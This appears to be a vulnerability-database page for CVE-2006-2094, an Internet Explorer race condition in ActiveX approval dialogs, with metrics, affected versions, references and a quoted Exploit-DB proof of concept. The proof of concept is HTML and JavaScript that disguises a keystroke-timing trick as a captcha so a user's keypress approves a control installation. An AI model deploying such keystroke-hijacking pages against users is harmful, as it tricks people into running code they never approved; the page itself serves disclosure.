CVE-2006-2094 : Detail

CVE-2006-2094

23.62%V3
Network
2006-04-29
08h00 +00:00
2017-07-19
13h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Microsoft Internet Explorer before Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1, when Prompt is configured in Security Settings, uses modal dialogs to verify that a user wishes to run an ActiveX control or perform other risky actions, which allows user-assisted remote attackers to construct a race condition that tricks a user into clicking an object or pressing keys that are actually applied to a "Yes" approval for executing the control.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 27744

Publication date : 2006-04-25 22h00 +00:00
Author : Matthew Murphy
EDB Verified : Yes

source: https://www.securityfocus.com/bid/17713/info Internet Explorer is prone to a remote code-execution vulnerability through exploiting a race-condition when displaying modal security dialog boxes. This issue may be exploited to cause users to inadvertently allow remote-code to be executed. <HEAD> <TITLE>Internet Explorer ActiveX Installation Vulnerability</TITLE> </HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000"> <SCRIPT> function doInstallControl() { document.body.innerHTML += "<OBJECT CLASSID=\"clsid:928626A3-6B98-11CF-90B4-00AA00A4011F\" TYPE=\"application/x-oleobject\" CODEBASE=\"http://activex.microsoft.com/activex/controls/museum/MSSurVid.cab#Version=1,2,0,7\" WIDTH=\"325\" HEIGHT=\"250\">\r\n" + "<PARAM NAME=\"SurroundRect\" VALUE=\"0,0,325,250\">\r\n" + "<PARAM NAME=\"Image\" VALUE=\"ritetree.jpg\">\r\n" + "</OBJECT>"; document.getElementById("captcha").focus(); } function doWaitEntry() { if (event.keyCode == 78 || event.keyCode == 110) { doInstallControl(); } } </SCRIPT> <FORM ACTION="" METHOD="GET"> Please enter the text you see on the left:<BR><BR> <B>on3l1y6y8y5y</B> <INPUT TYPE="text" ID="captcha" ONKEYPRESS="doWaitEntry()"> </FORM> </BODY>

Products Mentioned

Configuraton 0

Microsoft>>Ie >> Version 5

    Microsoft>>Ie >> Version 5.0

      Microsoft>>Ie >> Version 5.0

        Microsoft>>Ie >> Version 5.0

          Microsoft>>Ie >> Version 5.0.1

            Microsoft>>Ie >> Version 5.0.1

              Microsoft>>Ie >> Version 5.0.1

                Microsoft>>Ie >> Version 5.0.1

                  Microsoft>>Ie >> Version 6.0

                    Microsoft>>Ie >> Version 6.0

                      Microsoft>>Internet_explorer >> Version 5.0

                      Microsoft>>Internet_explorer >> Version 5.0.1

                      Microsoft>>Internet_explorer >> Version 5.0.1

                      Microsoft>>Internet_explorer >> Version 5.0.1

                      Microsoft>>Internet_explorer >> Version 5.0.1

                      Microsoft>>Internet_explorer >> Version 5.0.1

                      Microsoft>>Internet_explorer >> Version 5.5

                      Microsoft>>Internet_explorer >> Version 5.5

                      Microsoft>>Internet_explorer >> Version 5.5

                      Microsoft>>Internet_explorer >> Version 5.5

                      Microsoft>>Internet_explorer >> Version 6.0

                      Microsoft>>Internet_explorer >> Version 7.0

                      Microsoft>>Internet_explorer >> Version 7.0

                      References

                      http://www.vupen.com/english/advisories/2006/1559
                      Tags : vdb-entry, x_refsource_VUPEN
                      http://www.securityfocus.com/bid/17713
                      Tags : vdb-entry, x_refsource_BID
                      http://securitytracker.com/id?1015720
                      Tags : vdb-entry, x_refsource_SECTRACK
                      http://www.osvdb.org/22351
                      Tags : vdb-entry, x_refsource_OSVDB